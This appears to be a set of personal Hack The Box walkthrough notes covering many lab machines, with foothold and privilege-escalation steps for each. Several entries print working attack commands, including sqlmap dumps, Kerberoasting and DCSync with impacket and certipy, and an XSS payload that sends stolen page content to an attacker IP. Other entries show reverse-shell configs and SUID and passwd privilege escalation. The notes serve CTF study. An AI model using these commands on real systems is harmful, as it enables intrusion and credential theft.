HTB

Box Name

Type

Steps

Lessons

Monitored

Linux
Easy

Foothold

1. blind sql injection in password reset
2. exfiltrate admin password from admin_users
3. hashcat to crack bcrypt password
4. login as admin
5. upload a webshell from the profile page
6. reverse shell

PrivEsc

1. view .monitrc to get password for the other user
2. as the other user, sudo -l to see what you can run
3. https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks#id-7z

1. users and admin_users in laravel

2. Hacking with 7z

3. be aware of rabbit holes

Devvortex

Linux
Easy

Foothold

1. fuzz vhost to find the dev page
2. fuzz page to find joomla login page
3. find joomla version and it’s CVE
4. login to joomla as admin
5. modify php template to get webshell
6. on the server, login to mysql to get hash of other user
7. hashcat to crack the hash and get user flag

PrivEsc

1. sudo -l to view sudo commands
2. kill -BUS <pid> to generate a crash file in /var/crash/
3. sudo apport-cli -c <crash file>
4. view report
5. in the viewer, start a bash shell with !/bin/bash

1. Finding joomla version to see if there are exploits
/administrator/manifests/files/joomla.xml

2. generating crash files

Active

Windows
Easy

Foothold

1. nmap the target to find SMB share
2. connect anonymously to Replication share
3. pull Groups.xml that has a username and encrypted password
4. use gpp-decrypt to decrypt the password
5. connect to SMB Users share with the the username and password

PrivEsc

1. using the cracked username and password, use impacket-getuserspans to get a TGS for Administrator
2. Kerberoast - Hashcat to crack the password for the TGS to get plaintext password for Administrator
3. using the cracked password, connect to the Users share again and navigate to Administrator desktop

1. Groups.xml contains credentials that you can crack with gpp-decrypt
They are stored in
\\<DOMAIN>\sysvol\<DOMAIN>\policies\<id>\MACHINE\Preferences\Groups\Groups.xml

2. GetUserSPNs.py will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account’s password, which can then be cracked offline.

Builder

Linux
Medium

Foothold

1. nmap the target to find open port that hosts website
2. fluff to scan vhost to find dev.builder.htb
3. use LFI to exploit vulnerable Jenkins version
4. LFI users.xml and /<user>/config.xml
5. hashcat to crack password

PrivEsc

1. Once logged in as a user, LFI to get root password from /var/jenkins_home/credentials.xml
2. Create a groovy script to decrypt the SSH key for root user
3. Login as root

1. Users in jenkins are stored in /var/jenkins_home/users/users.xml

2. User’s hashed passwords are in /var/jenkins_home/users/<user>/config.xml

3. Root hashed password is in /var/jenkins_home/credentials.xml

Monitored

Linux
Medium

Foothold

1. nmap UDP to find snmp port 161 open
2. snmpwalk to get credentials svc:XjH7VCehowpR1xZB

3. curl /api/v1/authenticate" to get token

4. sqlmap to get api_key of Nagios_admin user
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=<auth token>" --level 5 --risk 3 -p id -T xi_users -D nagiosxi --dump -C username,api_key

5. create new user with API key
curl -POST -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=<nagios admin api key>&pretty=1" -d "username=baduser&password=baduser&name=baduser&email=baduser@monitored.htb&auth_level=admin"

6. create command in “Configure”>”Core Config Manager”>”Commands” to RCE

7. create service to run our command in “Configure”>”Core Config Manager”>”Services” to execute the command

PrivEsc
1. sudo -l to view what commands you can run as sudo
2. find a script that read the contents a file and adds it to a zip archive
3. create a symlink between that file and /root/root.txt
4. run the command as sudo to get the contents of the root flag

1. scan everything, TCP and UDP
2. Nagios shenanigans
3. symlinks to access root files

Greenhorn

Linux
Easy

Foothold

1. nmap to reveal port 80 and 3000
2. download the source code from gitea on port 3000
3. get pass.php and crack it
4. use CVE to upload web shell and get RCE

PrivEsc

1. Run http server on the victim and download the PDF
2. depix the image to get the root password

1. https://github.com/spipm/Depix to depixelate images

IClean

Linux
Medium

Foothold

1. XSS in quotation form to get admin session
2. SSTI in report generation
3. Use SSTI to get RCE and foothold
4. SSTI blacklists . and __, so we play SSTI golf
5. reading app.py, get mysql password
6. in users table, get hash of user account and crack it
7. get user flag

PrivEsc

1. sudo -l and see that we can run qpdf
2. sudo qpdf --empty /tmp/pwn.pdf --add-attachment /root/root.txt --
3. run a web server on the victim and download the pdf to attacker VM
4. open the pdf file and download the attachment to get root flag

1. qpdf shenanigans

PermX

Linux
Easy

Foothold

1. ffuf vhost to find lms.permx.htb
2. CVE-2023-4220 to get foothold
3. dump password from ~/app/.../configuration.php
4. reuse password to get access to user mtz

PrivEsc

1. sudo -l and see that we can run /opt/acl.sh
2. /opt/acl.sh runs setfacl to change permissions of a file
3. we can’t change the permissions of /root/root.txt directly as we don't have write permissions to /root folder
4. /opt/acl.sh also checks if there are .. characters to prevent directory traversal
5. we overcome this by creating a symlink to /

ln -s / pwned

6. generate a dummy password

openssl passed owned

7. modify permissions of /etc/passwd

sudo /opt/acl.sh mtz rwx /home/mtz/pwned/etc/passwd

8. change the password of root to the newly generated password above
9. su and enter the password to get root access

1. how to pwn /etc/passwd if you have write access to it
2. symlinks

SolarLab

Windows
Medium

Foothold

1. smbmap anonymous login to download the documents
2. Use credentials in the documents to login to report.solarlab.htb on port 6791
3. RCE on reportlab, put payload in the date field


PrivEsc

1. netstat -ano to find service running on 9090
2. chisel to port forward to attacker machine
3. CVE to create admin user and upload webshell

4. look at C:\Program Files\Openfire\embedded-db\openfire.script to get admin password
5. decrypt with
6. smbclient -N //solarlab.htb/C$ -U "Administrator%password"

1. Chisel port forwarding
2. CVE exploits
3. SMB shenanigans

Blazorized

Windows
Medium

Foothold

1. ffuf to find admin.blazorized.htb
2. Download shared.dll to get the JWT signing key
3. Craft your own key and put it in local storage at admin.blazorized.htb
4. SQL injection and xp_cmdshell to get RCE

PrivEsc

1. DACL attack 1: Stealing SPN

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "nu_1055"}

2. Get SPN and roast the ticket to get the password for RSA_4810, then evil-winrm

Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='test/tester'}

Get-DomainSPNTicket -SPN test/tester

3. DACL attack 2: Modifiable Script Path

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RSA_4810"}

4. Upload rev.ps to a script folder

C:\Windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23

5. Set script path for SSA_6010

Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\rev.ps1'

6. Once authenticated as SSA_6010, get meterpreter shell, load mimikatz and dcsync to get Administator hash

7. PTH to get root.txt

1. DACL attacks
2. Web Assembly Reversing
3. xp_cmdshell RCE

Alert

Linux
Easy

Foothold

1. Upload an MD file that contains an XSS payload
<script>
fetch("http://alert.htb/messages.php").then(response => response.text()).then(response => {fetch("http://10.10.14.6/?"+btoa(response))})
</script>

2. send a message that contains a link to the hosted payload
email=test%40test.com&message=<script src="http://alert.htb/visualizer.php?link_share=675155dfa06ca8.28692334.md

3. get messages.php and see that it makes a request that is vulnerable to LFI

<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>

4. LFI to get /etc/apache2/sites-enabled/000-default.conf

5. then LFI to get /var/www/statistics.alert.htb/.htpasswd and get albert hash
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/

6. crack the hash (1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR))
hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt

7. SSH as Albert

PrivEsc
1. run pspy64 to see cronjob

/bin/sh -c /usr/bin/php -f /opt/website-monitor/monitor.php >/dev/null 2>&1
/usr/bin/php -f /opt/website-monitor/monitor.php

2. /opt/website-monitor/monitor.php imports config/configuration.php

3. we can edit config/configuration.php
system(’chmod +s /bin/bash’)

4. get root

1. proc/self/cwd to go to current directory, instead of guessing the directory path

Administrator

Windows
Medium

Foothold

1. enum4linux -u olivia -p ichliebedich -a 10.129.178.110
2. see that benjamin is part of Share Moderatorslocal group
3. olivia is part of Remote Management Users
4. winrm into the machine
5. bloodhound
6. ethan can dcsync the DC
7. emily has generic write on ethan
8. olivia has generic write on michael
9. change password for michael and login as michael
10. michael has can force benjamin to change password
11. use rpcclient as michael
12. setuserinfo2 benjamin 23 password123!
13. FTP as benjamin to download Backup.psafe3
14. hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt (tekieromucho)
15. use passwordsafe to open up Backup.psafe3 to get emily’s password

PrivEsc
1. Change password of ethan
2. Write an SPN to ethan
$SecPassword = ConvertTo-SecureString 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\emily', $SecPassword)

Set-DomainObject -Credential $Cred -Identity administrator.htb\ethan -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}

Get-DomainSPNTicket -Credential $Cred administrator.htb\ethan | fl

3. Kerberoast ethan based on this newly created SPN
impacket-GetUserSPNs -dc-ip 10.129.178.110 -request -outputfile kerberos administrator.htb/olivia

4. crack the hash (limpbizkit)
5. dc-sync to get admin hash
impacket-secretsdump administrator.htb/ethan:"limpbizkit"@10.129.178.110
6. login as root

1. Bloodhound
2. Find-InterestingDomainAcl
2. ACL abuses
3. DCSync can be done either on the machine (mimikatz) or remotely (impacket-secretsdump

Certified

Windows
Medium

Foothold
1. Remote Bloodhound to see that judith can modify management group, and management group has GenericWrite on mangement_svc

Grant genericAll to Management group for judith.mader
python3 ~/tools/windows/bloodyAD/bloodyAD.py --host certified.htb -d certified.htb -u judith.mader -p judith09 add genericAll Management judith.mader

Once judith.mader has write access to Management, add the account to the group
net rpc group addmem Management judith.mader -U judith.mader -S certified.htb

Exploiting GenericWrite, we use certipy to get the NTLM hash of management_svc
certipy shadow auto -u judith.mader@certified.htb -p judith09 -account management_svc

2. using the hash, we use psexec to get foothold

PrivEsc
1. mangement_svc has GenericAll over ca_operator
2. Change the password of ca_operator
3. use certipy to find vulnerable template in the context of ca_operator

certipy find -u 'ca_operator@certified.htb' -p password123\! -dc-ip 10.129.244.229 -vulnerable

2. certipy shenanigans with the vulnerable template
https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7

certipy account update -username management_svc@certified.htb -hashes 00000000000000000000000000000000:a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn administrator

certipy req -ca certified-DC01-CA -u 'ca_operator@certified.htb' -p password123\! -dc-ip 10.129.244
.229 -template CertifiedAuthentication

certipy account update -username management_svc@certified.htb -hashes 00000000000000000000000000000
000:a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator

certipy auth -pfx administrator.pfx -dc-ip 10.129.244.229

to get administrator hash

3. psexec and get root

1. certipy shenanigans

MonitorsThree

Linux
Medium

Foothold
1. sql injection in monitorsthree.htb/forgot_password.php to get admin password
2. Fuzz the site to get cacti.monitorsthree.htb
3. login with admin password
4. exploit CVE-2024-25641 to get RCE
5. check one of the config files to get cactiuser:cactiuser for mysql
6. get the hash of marcus and crack it with hashcat
hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt
7. get local flag from marcus

PrivEsc
1. There’s a service running on port 8200
2. chisel our way in to find Duplicati service running
https://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee
3. We also find Duplicati-server.sqlite which contains the server-passphrase and server-passphrase-salt
4. Look at http://localhost:8200/login/login.js to see how the server authenticates
5. It first requests for a nonce value, then encrypts
SHA256(nonce + SHA256(server-passphrase + server-passphrase-salt))
6. It then sends the encrypted value back for verification
7. backup root.txt and restore it /source/home/marcus/root.txt

1. Don’t forget vhost fuzzing!
2. Duplicati shenanigans

Trickster

Linux
Medium

Foothold
1. Fuzz out a .git folder
2. git-dumper to get the contents, and find the admin page
3. CVE-2024-34716; XSS in image upload, and unrestricted file upload gets you a webshell
https://ayoubmokhtar.com/post/png_driven_chain_xss_to_remote_code_execution_prestashop_8.1.5_cve-2024-34716/
4. Find mysql password and hashcat password for james
5. su james to get local

PrivEsc
1. Find another IP address in the network, and a service running at port 5000
2. chisel to access the service, which is changedetection.io
3. use James password to get access to changedetection.io admin page
4. exploit the SSTI vulnerability in changedetection.io to get RCE on the Docker image
https://nvd.nist.gov/vuln/detail/CVE-2024-32651
5. As root on the Docker image, download the Backup Zip files
6. Unzip the contents and decode them using https://brotli.myl.moe/
7. Get the password for adam
8. adam can run prusaslicer as sudo
9. exploit to get root flag
https://www.exploit-db.com/exploits/51983

1. Check for other IP address, not just service running on the localhost

Heal

Linux
Medium

Foothold
1. LFI to get sensitive data from Ruby files
https://gist.github.com/harisec/b2deded5be122de0133dcd64dc8baa86
2. Crack the hash for the user
3. Login to the Lime Survey console
4. Exploit to get foothold
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
5. Get reused password from config file

PrivEsc
1. Find another service running on the local machine
2. Chisel to get access to it
3. RCE
https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/8171
{
"ID": "gg",
"Name": "gg",
"Shell":"/bin/sh",
"Interval": "5s",
"Args":["/bin/bash",
"/tmp/rev.sh"]}

1. Ruby sensitive files

Linkvortex

Linux
Easy

Foothold
1. Fuzz to get vhost
2. Fuzz vhost to get .git
3. Dump the .git directory with git-dumper
4. Find the password with grep -rne "password\s*=
5. git log to see the version of GhostCMS that vulnerable
6. Exploit the CVE to get LFI
7. LFI to read /var/lib/ghost/config.production.json to get credentials for SSH

PrivEsc
1. sudo -l to find out the command you can run
2. The script checks if the link file points to root or etc
3. Create a nested link file so that a.png -> b.png -> /root/root.txt
4. Export the environment variable export CHECK_CONTENT=true
5. sudo /usr/bin/bash /opt/ghost/clean_symlink.sh b.png c.png

1. Link file shenanigans
2. git log does not always contain everything
3. Check /.git/logs/HEAD to see who clone the repo

Vintage

Windows
Hard

Foothold
1. ldapsearch -x -H ldap://10.129.255.247 -b "dc=vintage,dc=htb" -w Rosaisbest123 -D p.rosa@vintage.htb
2. Find the DC name dc01.vintage.htb
3. python3 bloodhound.py -u P.Rosa -p 'Rosaisbest123' -d vintage.htb -c All -ns 10.129.255.247 --zip -dc dc01.vintage.htb

ㅤ